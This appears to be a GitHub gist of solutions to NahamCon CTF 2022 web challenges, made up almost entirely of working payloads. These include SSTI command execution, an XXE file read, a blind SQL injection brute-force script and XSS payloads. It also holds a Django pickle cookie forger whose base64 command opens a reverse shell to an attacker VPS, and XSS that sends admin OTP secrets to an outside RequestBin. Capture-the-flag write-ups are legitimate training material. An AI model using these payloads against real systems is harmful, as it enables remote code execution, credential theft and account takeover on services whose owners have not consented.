Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
NahamCon CTF 2022 - Solution

Challenge Deafcon (SSTI and Normalize)

name=taidh&email=taidh@cc{{joiner.__init__.__globals__.os.popen('cat${IFS}flag*').read()}}

Challenge EXtravagant (XXE Injection)

  • Upload file taidh.xml
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY payload SYSTEM 'file:///var/www/flag.txt'>]><root>&payload;</root>
  • Request to HOST:PORT/XML?file=taidh.xml
# SQLite Injection (Order by)
import requests
import string
import re
URL = "http://challenge.nahamcon.com:31423" # Change URL
res_regex = '<td style="width:20%">(.*?)</td>'
flag = ''
for i in range(1,500):
for char in string.ascii_letters + '_{}':
print(char,end='\r')
data = {'search':'a','order':f'(case when (substr((select flag from flag),{i},1)="{char}") then atomic_number else name end)'}
r = requests.post(URL, data=data)
res = re.findall(res_regex,r.text)[0]
if "12" in res:
flag += char
print(flag)
break

Challenge Hacker Ts (XSS)

<h1 id=taidh></h1>
<script>
	var a = new XMLHttpRequest();
	a.open("GET","http://localhost:5000/admin",false);
	a.send();
	document.getElementById('taidh').innerHTML = a.responseText;
</script>

Challenge Personnel (Regex Injection)

POST / HTTP/1.1
Host: challenge.nahamcon.com:30349
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Connection: close

setting=0&name=|.*|

Challenge Poller (Picker Serialize and Reveal the SECRET_KEY - Django)

  • Find SECRET_KEY in source github

    • Fake SECRET_KEY -> Link
    • The right SECRET_KEY -> Link
  • Picker Serialize Recommended to use Django 4.0.4

import os
import django.core.signing
import pickle
import base64
import django.contrib.sessions.serializers as serializers

SECRET_KEY = '77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!'
salt = 'django.contrib.sessions.backends.signed_cookies'

class Command(object):
    def __reduce__(self):
        return (os.system,("echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiW0ldIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiL2Jpbi9zaCIpJwo= | base64 -d | sh",)) # Decode string base64 and change to your IP vps

my_cookie= django.core.signing.dumps(Command(),key=SECRET_KEY,salt= salt, serializer=serializers.PickleSerializer,compress=True)

print(my_cookie)
  • nc -lvnp 4444 in your VPS
  • Change above cookie to sessionid

Challenge Two For One (Leak OTP and XSS)

There are xss in feedback

  • Leak OTP admin
<script>fetch('/reset2fa',{method: 'POST'}).then(r=>r.json()).then(r=>{fetch('http://[RequestBin]?cc='+r.url);});</script>

Then login at Google Authenticator with username admin and secret receive

  • Show secret of admin
<script>
fetch('/show_secret', {
    method: 'POST',
    headers: {
      'Accept': 'application/json',
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({otp: 680661, secretId: 1}) //change OTP
  }).then(r=>r.text()).then(r=>{fetch('http://[RequestBin]?cc='+btoa(r));});
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment